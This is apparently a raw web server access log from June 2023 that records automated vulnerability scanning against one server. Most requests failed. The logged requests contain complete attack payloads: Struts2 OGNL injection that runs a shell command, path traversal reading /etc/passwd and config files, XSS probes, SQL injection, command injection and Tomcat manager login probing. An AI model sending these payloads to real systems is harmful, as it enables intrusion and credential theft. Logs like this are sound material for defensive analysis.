107.189.31.184 - - [17/Jun/2023:15:36:21 +0530] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:15:36:23 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:15:36:23 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:15:36:25 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:15:36:25 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:15:36:27 +0530] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:15:36:27 +0530] "GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:15:36:29 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:15:36:29 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:15:36:31 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:15:36:32 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:15:36:33 +0530] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:15:36:34 +0530] "GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:15:36:36 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:15:36:37 +0530] "GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1" 404 1164
107.189.31.184 - - [17/Jun/2023:15:36:37 +0530] "GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1" 404 1164
107.189.31.184 - - [17/Jun/2023:15:36:39 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:15:36:41 +0530] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:15:36:50 +0530] "GET /server/ HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:15:36:51 +0530] "GET /server/ HTTP/1.1" 404 1008
41.186.73.134 - - [17/Jun/2023:15:37:42 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:15:38:15 +0530] "GET /config.properties HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:15:38:17 +0530] "GET /config.properties.bak HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:15:38:17 +0530] "GET /config.properties HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:15:38:19 +0530] "GET /config.properties.bak HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:15:38:20 +0530] "GET /ui_config.properties HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:15:38:21 +0530] "GET /ui_config.properties HTTP/1.1" 404 1034
41.186.73.134 - - [17/Jun/2023:15:38:47 +0530] "GET /manager/html HTTP/1.1" 401 2473
79.124.56.98 - - [17/Jun/2023:15:40:33 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:15:41:08 +0530] "POST /_bulk HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:15:41:09 +0530] "POST /_bulk HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:15:41:28 +0530] "GET /KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:15:41:28 +0530] "GET /KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1020
41.186.73.134 - - [17/Jun/2023:15:42:11 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:15:42:14 +0530] "POST /cobbler_api HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:15:42:14 +0530] "POST /cobbler_api HTTP/1.1" 404 1016
90.151.171.108 - - [17/Jun/2023:15:42:30 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:15:42:30 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:15:42:35 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:15:42:35 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:15:42:40 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:15:42:40 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
205.185.115.70 - - [17/Jun/2023:15:42:42 +0530] "CONNECT www.baidu.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:15:42:45 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:15:42:45 +0530] "-" 400 -
41.186.73.134 - - [17/Jun/2023:15:43:16 +0530] "GET /manager/html HTTP/1.1" 401 2473
167.94.145.57 - - [17/Jun/2023:15:45:19 +0530] "GET / HTTP/1.1" 200 11250
167.94.145.57 - - [17/Jun/2023:15:45:19 +0530] "GET / HTTP/1.1" 200 11250
79.124.56.98 - - [17/Jun/2023:15:45:19 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 1040
167.94.145.57 - - [17/Jun/2023:15:45:19 +0530] "PRI * HTTP/2.0" 505 -
167.94.145.57 - - [17/Jun/2023:15:45:20 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
41.186.73.134 - - [17/Jun/2023:15:46:27 +0530] "GET /manager/html HTTP/1.1" 401 2473
218.103.196.91 - - [17/Jun/2023:15:46:44 +0530] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:15:47:29 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:15:47:38 +0530] "POST /index.php?f=login_save&m=member HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:15:47:39 +0530] "POST /index.php?f=login_save&m=member HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:15:48:17 +0530] "POST /process/aprocess.php HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:15:48:18 +0530] "GET /cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:15:48:18 +0530] "GET /cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:15:48:18 +0530] "POST /process/aprocess.php HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:15:50:00 +0530] "GET /api/image/cover-upload?filename=../appsettings.json HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:15:50:01 +0530] "GET /api/image/cover-upload?filename=../appsettings.json HTTP/1.1" 404 1038
41.186.73.134 - - [17/Jun/2023:15:50:50 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:15:50:52 +0530] "POST /0/Authenticate HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:15:50:53 +0530] "POST /0/Authenticate HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:15:51:11 +0530] "GET /?after_logout=https://interact.sh&aiowpsec_do_log_out=1 HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:15:51:11 +0530] "GET /?after_logout=https://interact.sh&aiowpsec_do_log_out=1 HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:15:51:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
64.62.197.55 - - [17/Jun/2023:15:53:07 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:15:54:54 +0530] "POST /forms/doLogin HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:15:54:54 +0530] "POST /forms/doLogin HTTP/1.1" 404 1020
41.186.73.134 - - [17/Jun/2023:15:55:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:15:55:43 +0530] "GET /css_parser.php?css=css_parser.php HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:15:55:44 +0530] "GET /css_parser.php?css=css_parser.php HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:15:55:56 +0530] "GET /dolibarr/adherents/cartes/carte.php?foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mode=cardlogin&model=5160&optioncss=print HTTP/1.1" 404 1064
107.189.31.184 - - [17/Jun/2023:15:55:58 +0530] "GET /dolibarr/adherents/cartes/carte.php?foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mode=cardlogin&model=5160&optioncss=print HTTP/1.1" 404 1064
41.186.73.134 - - [17/Jun/2023:15:56:11 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:15:57:13 +0530] "PUT /meta HTTP/1.1" 403 1004
107.189.31.184 - - [17/Jun/2023:15:57:13 +0530] "PUT /meta HTTP/1.1" 403 1004
41.186.73.134 - - [17/Jun/2023:15:59:23 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:16:00:26 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:16:00:42 +0530] "GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:16:00:42 +0530] "GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1" 404 1006
41.186.73.134 - - [17/Jun/2023:16:03:43 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:16:03:55 +0530] "GET /set_safety.shtml?r=52300 HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:16:03:56 +0530] "GET /set_safety.shtml?r=52300 HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:16:04:13 +0530] "POST / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:16:04:14 +0530] "POST / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:16:04:52 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:16:04:53 +0530] "GET /pma/server_import.php HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:16:04:55 +0530] "GET /phpmyadmin/server_import.php HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:16:04:57 +0530] "GET /phpMyAdmin%202/server_import.php HTTP/1.1" 404 1058
107.189.31.184 - - [17/Jun/2023:16:04:59 +0530] "GET /db/server_import.php HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:16:05:01 +0530] "GET /server_import.php HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:16:05:03 +0530] "GET /PMA/server_import.php HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:16:05:03 +0530] "GET /pma/server_import.php HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:16:05:05 +0530] "GET /phpmyadmin/server_import.php HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:16:05:05 +0530] "GET /admin/server_import.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:16:05:07 +0530] "GET /phpMyAdmin%202/server_import.php HTTP/1.1" 404 1058
107.189.31.184 - - [17/Jun/2023:16:05:07 +0530] "GET /admin/pma/server_import.php HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:16:05:09 +0530] "GET /db/server_import.php HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:16:05:09 +0530] "GET /phpMyAdmin/server_import.php HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:16:05:12 +0530] "GET /server_import.php HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:16:05:13 +0530] "GET /admin/phpMyAdmin/server_import.php HTTP/1.1" 404 1062
107.189.31.184 - - [17/Jun/2023:16:05:14 +0530] "GET /PMA/server_import.php HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:16:05:20 +0530] "GET /admin/server_import.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:16:05:22 +0530] "GET /admin/pma/server_import.php HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:16:05:24 +0530] "GET /wp-json/guppy/v2/load-guppy-users?offset=0&search&userId=1 HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:16:05:24 +0530] "GET /phpMyAdmin/server_import.php HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:16:05:25 +0530] "GET /wp-json/guppy/v2/load-guppy-users?offset=0&search&userId=1 HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:16:05:26 +0530] "GET /admin/phpMyAdmin/server_import.php HTTP/1.1" 404 1062
45.128.232.141 - - [17/Jun/2023:16:06:43 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:16:07:26 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:16:07:34 +0530] "-" 400 -
41.186.73.134 - - [17/Jun/2023:16:08:02 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:16:09:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:16:09:35 +0530] "GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php HTTP/1.1" 404 1098
107.189.31.184 - - [17/Jun/2023:16:09:36 +0530] "GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php HTTP/1.1" 404 1098
107.189.31.184 - - [17/Jun/2023:16:10:03 +0530] "GET /wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e HTTP/1.1" 404 1124
107.189.31.184 - - [17/Jun/2023:16:10:04 +0530] "GET /wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e HTTP/1.1" 404 1124
41.186.73.134 - - [17/Jun/2023:16:12:10 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:16:13:12 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:16:16:28 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:16:17:35 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:16:17:45 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:16:17:45 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:16:18:40 +0530] "GET /Admin HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:16:18:40 +0530] "GET /Admin HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:16:19:10 +0530] "GET /api/settings/values HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:16:19:11 +0530] "GET /api/settings/values HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:16:19:41 +0530] "GET /../../../../../../../../../etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:16:19:42 +0530] "GET /../../../../../../../../../etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:16:19:59 +0530] "GET /api/users/search_authors HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:16:20:00 +0530] "GET /api/users/search_authors HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:16:20:38 +0530] "GET /admin/ HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:16:20:39 +0530] "GET /admin/ HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:16:20:40 +0530] "GET /solr/admin/ HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:16:20:41 +0530] "GET /solr/admin/ HTTP/1.1" 404 1016
41.186.73.134 - - [17/Jun/2023:16:20:43 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:16:21:29 +0530] "GET /CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:16:21:29 +0530] "GET /CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:16:21:46 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:16:22:44 +0530] "GET /wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1084
107.189.31.184 - - [17/Jun/2023:16:22:44 +0530] "GET /wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1084
107.189.31.184 - - [17/Jun/2023:16:23:15 +0530] "GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1" 404 1174
107.189.31.184 - - [17/Jun/2023:16:23:16 +0530] "GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1" 404 1174
107.189.31.184 - - [17/Jun/2023:16:23:17 +0530] "GET /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1" 404 1192
107.189.31.184 - - [17/Jun/2023:16:23:18 +0530] "GET /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1" 404 1192
107.189.31.184 - - [17/Jun/2023:16:24:16 +0530] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1" 404 1094
107.189.31.184 - - [17/Jun/2023:16:24:18 +0530] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1" 404 1094
198.144.159.126 - - [17/Jun/2023:16:24:25 +0530] "CONNECT cn.bing.com:443 HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:16:24:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:16:25:41 +0530] "GET /wizard.htm HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:16:25:41 +0530] "GET /wizard.htm HTTP/1.1" 404 1014
185.149.35.78 - - [17/Jun/2023:16:25:57 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:16:26:01 +0530] "GET /manager/html HTTP/1.1" 401 2473
87.120.88.58 - - [17/Jun/2023:16:26:43 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:16:26:50 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:16:26:50 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:16:26:50 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:16:26:50 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:16:26:55 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:16:26:55 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:16:26:55 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:16:26:55 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:16:28:48 +0530] "GET /visualizza_tabelle.php?anno=2021&sel_tab_prenota=tutte&tipo_tabella=prenotazioni&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1 HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:16:28:50 +0530] "GET /storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1 HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:16:28:50 +0530] "GET /visualizza_tabelle.php?anno=2021&sel_tab_prenota=tutte&tipo_tabella=prenotazioni&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1 HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:16:28:52 +0530] "GET /tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1 HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:16:28:52 +0530] "GET /storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1 HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:16:28:54 +0530] "GET /crea_modelli.php?T_PHPR_DB_HOST=localhost&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_DB_PORT=5432&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno=2021&anno_modello=2021&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&fonte_dati_conn=attuali&form_availability_calendar_template=1&id_sessione&lingua_modello=en HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:16:28:54 +0530] "GET /tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1 HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:16:28:56 +0530] "GET /crea_modelli.php?T_PHPR_DB_HOST=localhost&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_DB_PORT=5432&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno=2021&anno_modello=2021&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&fonte_dati_conn=attuali&form_availability_calendar_template=1&id_sessione&lingua_modello=en HTTP/1.1" 404 1026
41.186.73.134 - - [17/Jun/2023:16:29:20 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:16:30:25 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:16:31:04 +0530] "GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1" 404 1084
107.189.31.184 - - [17/Jun/2023:16:31:05 +0530] "GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1" 404 1084
107.189.31.184 - - [17/Jun/2023:16:31:06 +0530] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 404 1136
107.189.31.184 - - [17/Jun/2023:16:31:07 +0530] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 404 1136
107.189.31.184 - - [17/Jun/2023:16:31:25 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:16:31:25 +0530] "GET null null" 400 -
41.186.73.134 - - [17/Jun/2023:16:33:42 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:16:33:59 +0530] "GET /status HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:16:33:59 +0530] "GET /status HTTP/1.1" 404 1006
41.186.73.134 - - [17/Jun/2023:16:34:46 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:16:34:59 +0530] "POST /.antproxy.php HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:16:35:00 +0530] "POST /.antproxy.php HTTP/1.1" 404 1020
41.186.73.134 - - [17/Jun/2023:16:37:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:16:37:57 +0530] "GET /mdocs-posts/?mdocs-img-preview=../../../wp-config.php HTTP/1.1" 404 1018
